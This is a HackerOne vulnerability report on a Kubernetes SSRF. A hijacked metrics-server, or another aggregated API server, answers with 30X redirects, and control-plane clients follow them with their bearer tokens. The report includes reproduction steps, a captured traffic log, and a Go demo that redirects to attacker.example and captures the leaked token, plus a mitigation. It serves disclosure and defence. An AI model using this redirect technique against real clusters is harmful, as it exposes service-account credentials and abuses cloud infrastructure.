hackerone / weinongw / H1:1544133
History: Apr 19, 2022 - 1:33 a.m.

Kubernetes: SSRF vulnerability can be exploited when a hijacked aggregated API server such as metrics-server returns 30X

2022-04-19 01:33:58 | weinongw | hackerone.com | Bounty: $1000
Tags: ssrf, vulnerability, kubernetes, metrics-server, hijacked, 30x redirect, aks, cloud providers, traffic, bugbounty
EPSS: 0.001 (percentile 28.1%)

Report Submission Form

Summary:

This report uses metrics-server as an example, but it should be applicable to any aggregated API server.

When metrics-server is hijacked, either by modifying the container image directly or by running other pods using the same label selector in the kube-system namespace, and is returning a 30X redirect, the clients calling the metrics API will follow the redirect.

It could be a serious issue in managed Kubernetes offerings such as Azure Kubernetes Service (AKS), where clients from managed components may be redirected to call internal endpoints.

Note: my coworker, Nicolas Joly, found the issue and reported it to my team (AKS).

Kubernetes Version:

All k8s versions on AKS. I believe it's the same in other cloud providers.

Component Version:

n/a

Steps To Reproduce:

  • The attached main.go is a very simple redirecting API server. I've built the Docker image as weinong/go-redirect.
  • Update and deploy go-redirect.yaml with your endpoint to capture the redirected traffic, in the kube-system namespace. It uses the same pod label selector as metrics-server does.
  • You should be able to observe redirected traffic from the control plane components.

Supporting Material/References:

Sample output logged by the web server capturing the redirected traffic:

2022/04/16 00:30:13 src IP: 20.51.80.40:4096
GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/json, */*
Accept-Encoding: gzip
Authorization: Bearer <omitted>
User-Agent: azurepolicyaddon/v0.0.0 (linux/amd64) kubernetes/$Format

GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/vnd.kubernetes.protobuf, */*
Authorization: Bearer <omitted>
User-Agent: kube-controller-manager/v1.17.13 (linux/amd64) kubernetes/f4a8e76/system:serviceaccount:kube-system:generic-garbage-collector

2022/04/16 00:34:37 src IP: 20.69.190.88:21504
GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/json, */*
Accept-Encoding: gzip
Authorization: Bearer  <omitted>
User-Agent: cpmonitor/v0.0.0 (linux/amd64) kubernetes/$Format

Impact

  • The bearer token may be logged in the logging systems of those internal backends.
  • Potentially, it may be logged by kube-controller-manager or the Kubernetes API server at certain verbosity levels (not verified).
  • Redirected traffic may hit external/internal endpoints for spamming, which would look as if it originated from the cloud providers.
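
As an added illustration of the behaviour this report describes (this is not the reporter's main.go or go-redirect.yaml, and none of it is Kubernetes project code), the following Go program stands up two local HTTP servers: one that answers every request with a 302, standing in for the hijacked aggregated API server, and one that records whatever arrives, standing in for the endpoint configured to capture the redirected traffic. It then calls the redirecting server with three client configurations. The hostnames metrics-server.kube-system.svc and attacker.example, the token string, the request path and the User-Agent are all constructed for the example; a custom dialer sends every hostname to 127.0.0.1 so no DNS is needed. The bearerTransport type is a model of a transport that sets the Authorization header on every round trip, which is how I understand client-go's bearer-token round tripper to behave; that is an assumption about client-go, not something the report states.

```go
package main

import (
	"context"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"sync"
)

// Captured is one request that reached the attacker-controlled endpoint.
type Captured struct{ Path, Authorization, UserAgent string }

// captureServer stands in for the endpoint the redirect points at and records what arrives.
type captureServer struct {
	mu   sync.Mutex
	seen []Captured
}

func (c *captureServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	c.mu.Lock()
	defer c.mu.Unlock()
	c.seen = append(c.seen, Captured{r.URL.Path, r.Header.Get("Authorization"), r.Header.Get("User-Agent")})
}

// hijackedAPIServer stands in for a hijacked aggregated API server: every request gets a 302 to the attacker.
func hijackedAPIServer(target string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, target+r.URL.Path, http.StatusFound)
	})
}

// bearerTransport sets the token on every round trip (assumed to match client-go's bearer-token round tripper).
// net/http drops Authorization from a redirected request bound for another host; this puts it straight back.
type bearerTransport struct{ token string; base http.RoundTripper }

func (t *bearerTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	req = req.Clone(req.Context())
	req.Header.Set("Authorization", "Bearer "+t.token)
	return t.base.RoundTrip(req)
}

// loopbackTransport dials every hostname to 127.0.0.1 on the requested port, so the made-up hostnames need no DNS.
func loopbackTransport() *http.Transport {
	return &http.Transport{DialContext: func(ctx context.Context, network, addr string) (net.Conn, error) {
		_, port, _ := net.SplitHostPort(addr)
		return (&net.Dialer{}).DialContext(ctx, network, net.JoinHostPort("127.0.0.1", port))
	}}
}

// Result is the status the caller of the metrics API saw and what reached the attacker meanwhile.
type Result struct{ Status int; Captured []Captured }

func callMetricsAPI(client *http.Client, url, token string, capture *captureServer) (Result, error) {
	req, _ := http.NewRequest(http.MethodGet, url, nil)
	req.Header.Set("User-Agent", "example-controller/v0.0.0 (linux/amd64)") // constructed UA
	if token != "" { // the plain client carries the token on the request itself
		req.Header.Set("Authorization", "Bearer "+token)
	}
	resp, err := client.Do(req)
	if err != nil {
		return Result{}, err
	}
	resp.Body.Close()
	capture.mu.Lock()
	defer capture.mu.Unlock()
	got := capture.seen
	capture.seen = nil
	return Result{resp.StatusCode, got}, nil
}

// RunScenarios starts both servers and calls the hijacked API server with three client configurations.
func RunScenarios() (map[string]Result, error) {
	capture := &captureServer{}
	attacker := httptest.NewServer(capture)
	hijacked := httptest.NewServer(hijackedAPIServer(fmt.Sprintf("http://attacker.example:%d", attacker.Listener.Addr().(*net.TCPAddr).Port)))
	defer func() { hijacked.Close(); attacker.Close() }()
	metricsURL := fmt.Sprintf("http://metrics-server.kube-system.svc:%d/apis/metrics.k8s.io/v1beta1/nodes", hijacked.Listener.Addr().(*net.TCPAddr).Port)
	const token = "constructed-service-account-token" // constructed, not a real token
	out := map[string]Result{}
	for _, s := range []struct{ name string; client *http.Client; token string }{
		// plain net/http: Authorization is dropped on the cross-host redirect, but the request still lands on the attacker
		{"plain", &http.Client{Transport: loopbackTransport()}, token},
		// token-injecting transport: the token is re-added after the redirect and leaks with the request
		{"bearer_transport", &http.Client{Transport: &bearerTransport{token, loopbackTransport()}}, ""},
		// same transport, but a 30X from the aggregated API server is handed back to the caller instead of followed
		{"no_follow", &http.Client{Transport: &bearerTransport{token, loopbackTransport()}, CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}, ""},
	} {
		r, err := callMetricsAPI(s.client, metricsURL, s.token, capture)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", s.name, err)
		}
		out[s.name] = r
	}
	return out, nil
}

func main() { fmt.Println(RunScenarios()) }
```

The three scenarios separate the two halves of the issue. With a plain net/http client the request still reaches the attacker (the SSRF half), but Go's own redirect handling drops the Authorization header because the new host is not the original one. With a transport that injects the token on every round trip, the header is re-added after that stripping and the captured line looks like the log output above, token included. Refusing to follow the 30X with CheckRedirect keeps both the request and the token from leaving; this is one client-side mitigation for illustration, not a statement about how the issue was fixed upstream.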